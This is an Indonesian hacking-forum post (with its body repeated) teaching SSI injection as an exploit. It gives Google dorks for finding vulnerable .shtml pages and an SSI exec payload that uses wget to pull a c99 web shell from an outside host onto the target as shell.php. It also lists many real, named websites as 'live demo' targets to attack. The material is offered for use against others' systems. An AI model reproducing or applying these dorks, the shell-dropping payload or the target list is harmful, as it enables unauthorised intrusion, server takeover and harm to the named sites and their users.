04-28-2013, 12:16 PM
SSI Injection (Server-side Include) adalah tehnik exploit server side yang mengizinkan attacker untuk mengirim perintah yang nanti nya akan di eksekusi oleh web server
SSI Injection memanfaatkan kegagalan aplikasi web untuk membersihkan data yang disediakan pengguna sebelum mereka dimasukkan ke dalam server-side ditafsirkan file HTML
Sever Side Includes Termasuk serangan memungkinkan eksploitasi aplikasi web dengan menginjeksi skrip dalam halaman HTML atau mengeksekusi kode arbitrary codes remotely.
Kalau di Php untuk memulai dan menutup kita gunakan <? dan ?>
kalau SSI <!-- -->
Include PHP
Include SSI
SSI untuk mengeskekusi perintah CLI
CGI
<!--#exec cgi="/cgi-bin/any_script.cgi" -->
biasanya halaman yang menggunakan SSI itu berformat
.shtml / .shtm / .stm
Sudah perkenalan dengan ssi mari kita melakukan exploitasi ..
Kita bisa gunakan
[spoiler for="Dork"]
inurl:bin/Cklb/ - Best Dork
inurl:login.shtml
inurl:login.shtm
inurl:login.stm
inurl
earch.shtml
inurlearch.shtm
inurlearch.stm
inurl:forgot.shtml
inurl:forgot.shtm
inurl:forgot.stm
inurl:register.shtml
inurl:register.shtm
inurl:register.stm
inurl:login.shtml?page=
[/spoiler]
![[Image: Fw7qE.png]](http://i.imgur.com/Fw7qE.png)
<!--#echo var="HTTP_USER_AGENT" -->
![[Image: 8oms4.png]](http://i.imgur.com/8oms4.png)
<!--#exec cmd="wget http://www.sh3ll.org/c99.txt? -O shell.php" -->
![[Image: VDc9n.png]](http://i.imgur.com/VDc9n.png)
sitetarget.com/shell.php
![[Image: 4a7bR.png]](http://i.imgur.com/4a7bR.png)
anda bisa coba di sini ... walau sih di situ udah di fix .. tapi beberapa perintah masih bisa
[spoiler for="live demo"]
http://www.cgibackgrounds.com/bin/Cklb
http://www.stockshop.com/bin/Cklb
http://www.fogstock.com/bin/Cklb
http://www.glasshouseimages.com/user/login.shtml
http://www.wppionlinecontest.com/user/login.shtml
www.cgibackgrounds.com/user/login.shtml
www.getstock.com/user/login.shtml
www.estostock.com/user/login.shtml
http://www.blendimages.com/user/login.shtml
http://www.pdnthelook.com/user/login.shtml
http://iloveimages.com/user/login.shtml
http://www.win-initiative.com/user/login.shtml (view source to see output)
http://thegatheringsphotocontest.com/user/login.shtml
[/spoiler]
Sumber :
https://www.owasp.org/index.php/Testing_...SP-DV-009)
penjelasannya agak berantakan ya soalnya dari bahasa ingriss ane translate manual :v .... jika berkenaan bisa leparin ane cendol ....
SSI Injection memanfaatkan kegagalan aplikasi web untuk membersihkan data yang disediakan pengguna sebelum mereka dimasukkan ke dalam server-side ditafsirkan file HTML
Sever Side Includes Termasuk serangan memungkinkan eksploitasi aplikasi web dengan menginjeksi skrip dalam halaman HTML atau mengeksekusi kode arbitrary codes remotely.
Kalau di Php untuk memulai dan menutup kita gunakan <? dan ?>
kalau SSI <!-- -->
Include PHP
Code:
<? include "file.html"; ?>Code:
<!-- #include virtual="file.html" -->SSI untuk mengeskekusi perintah CLI
Code:
<!-- #exec cmd="ls -A" -->CGI
Code:
<!-- #exec cmd="ls -A" -->biasanya halaman yang menggunakan SSI itu berformat
.shtml / .shtm / .stm
Sudah perkenalan dengan ssi mari kita melakukan exploitasi ..
Kita bisa gunakan
[spoiler for="Dork"]
inurl:bin/Cklb/ - Best Dork
inurl:login.shtml
inurl:login.shtm
inurl:login.stm
inurl
earch.shtmlinurl
earch.shtminurl
earch.stminurl:forgot.shtml
inurl:forgot.shtm
inurl:forgot.stm
inurl:register.shtml
inurl:register.shtm
inurl:register.stm
inurl:login.shtml?page=
[/spoiler]
<!--#echo var="HTTP_USER_AGENT" -->
<!--#exec cmd="wget http://www.sh3ll.org/c99.txt? -O shell.php" -->
sitetarget.com/shell.php
anda bisa coba di sini ... walau sih di situ udah di fix .. tapi beberapa perintah masih bisa
[spoiler for="live demo"]
http://www.cgibackgrounds.com/bin/Cklb
http://www.stockshop.com/bin/Cklb
http://www.fogstock.com/bin/Cklb
http://www.glasshouseimages.com/user/login.shtml
http://www.wppionlinecontest.com/user/login.shtml
www.cgibackgrounds.com/user/login.shtml
www.getstock.com/user/login.shtml
www.estostock.com/user/login.shtml
http://www.blendimages.com/user/login.shtml
http://www.pdnthelook.com/user/login.shtml
http://iloveimages.com/user/login.shtml
http://www.win-initiative.com/user/login.shtml (view source to see output)
http://thegatheringsphotocontest.com/user/login.shtml
[/spoiler]
Sumber :
https://www.owasp.org/index.php/Testing_...SP-DV-009)
penjelasannya agak berantakan ya
soalnya dari bahasa ingriss ane translate manual :v .... jika berkenaan bisa leparin ane cendol ....
